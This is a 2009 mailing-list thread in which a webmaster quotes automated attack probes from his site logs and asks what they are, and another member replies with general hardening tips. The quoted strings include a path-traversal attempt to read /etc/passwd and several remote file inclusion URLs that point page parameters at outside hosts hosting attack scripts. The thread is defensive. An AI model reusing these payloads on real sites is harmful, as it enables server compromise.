[dba-Tech] weird website probes

Peter Brawley peter.brawley at earthlink.net
Fri Apr 10 14:20:47 CDT 2009 

Hi Jim,

Thanks very much, yes it's on Linux (wouldn't dream of trying to serve a 
website from Winders), it's db-driven, access info is outside the 
document tree, I block known website copiers via .htaccess (but of 
course new ones keep appearing). Most of the hack attempts emanate from 
China, Russia, Mexico & the Czech Republic. Most of the probes are 
automated (too fast to be manual), these sorts of strings appended in a 
very few secs to ten or so existing page urls ...

index.php?var=../../../../../../../../../../../../../../../../etc/passwd%00
out.html
?page=http://kbapt.co.kr/bbs/templates/id1.txt?????
?page=http://mir-linux.ru/lang/idfx1.txt??
?page=http://www.allati-finomsagok.hu/components/com_virtuemart/shop_image/product/resized/thumbnail/id1.txt??
?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0
&qsrc=2870
%20%20/index.php?var=http://www.candidography.com/zero/id1.txt
%20.../werbungFrame.php?do=http://pastebin.com/f448457c2????

Well, the first one is trying to find a password hiding in a GET, lol, 
but the rest are obscure. I was wondering if anyone recognises these probes.

PB

-----

Jim Lawrence wrote:
> Hi Peter:
>
> All sites get probed for weaknesses on the web. That is pretty standard.
> Below is a list of common searches performed by serious hackers looking for
> opportunities:
>
> 1. If any of your directories are readable and have important data that
> information can be cleamed. If you have any important data in a website it
> is open to anyone. There are many open-source or free products like
> 'BackStreetBrowser' (http://www.spadixbd.com/backstreet/) that can copy a
> whole site as fast as the bandwidth will allow. 
> 2. Any directories that are writable can be used to either store temporary
> information or leave time-bombs in hope that you may try and run them...
> some gullible or tired webmasters have even inadvertently spawned zombies on
> their sites that way.
> 3. Some sites that have open FTP (command line) accessible and even password
> protected may find someone running a little loop routine attempting a
> dictionary attack... given that there are usually no limits to how many
> 'trys' the hacker is allowed.
> 4. If you manager your own mail within your website build your mail service
> correctly. Use a Captcha, return email etc... Any web site beyond a Postcard
> site needs a database and a programmed backend for security and management.
> 5. If you do have admin access from your site keep the pasword long and
> filled with mixed cases, numbers and special characters.
>
> Outside of that you are really pretty safe. 
>
> If you are using IIS, check you logs and see if there is a consistency of
> login attempts: c:<windows directory>/system32/logfiles/*.log and if there
> is you can block the range of IPs through IIS > default SMTP > properties >
> Connection  > add. The site http://whois.domaintools.com/ can be a great
> source for specifics on a hacker's locations. (I have found traditionally
> client's attackers are from China and central European.)
>
> You may already know all this but I HTH.
>
> Jim  
>
> -----Original Message-----
> From: dba-tech-bounces at databaseadvisors.com
> [mailto:dba-tech-bounces at databaseadvisors.com] On Behalf Of Peter Brawley
> Sent: Thursday, April 09, 2009 8:36 PM
> To: Discussion of Hardware and Software issues
> Subject: [dba-Tech] weird website probes
>
> I've taken to studying NotFound/Unauthorised errors at our site. We get 
> hundreds of weird probes a day, mostly in bursts, eg just a few minutes 
> ago we got about a dozen of these in a few seconds:
>
> www.artfulsoftware.com/php_mysql_win.html%20%20/index.php?var=http://www.can
> didography.com/zero/id1.txt??
>
> www.artfulsoftware.com/php_mysql_win.html is a real page. The rest looks 
> like a probe of some sort. A probe for what? GET-based vulnerabilities?  
> Anybody have an idea what such vandals might be trying to accomplish?
>
> PB
>
>
>
>
> _______________________________________________
> dba-Tech mailing list
> dba-Tech at databaseadvisors.com
> http://databaseadvisors.com/mailman/listinfo/dba-tech
> Website: http://www.databaseadvisors.com
>
> _______________________________________________
> dba-Tech mailing list
> dba-Tech at databaseadvisors.com
> http://databaseadvisors.com/mailman/listinfo/dba-tech
> Website: http://www.databaseadvisors.com
> ------------------------------------------------------------------------
>
>
> No virus found in this incoming message.
> Checked by AVG - www.avg.com 
> Version: 8.0.238 / Virus Database: 270.11.51/2052 - Release Date: 04/10/09 06:39:00
>
>

More information about the dba-Tech mailing list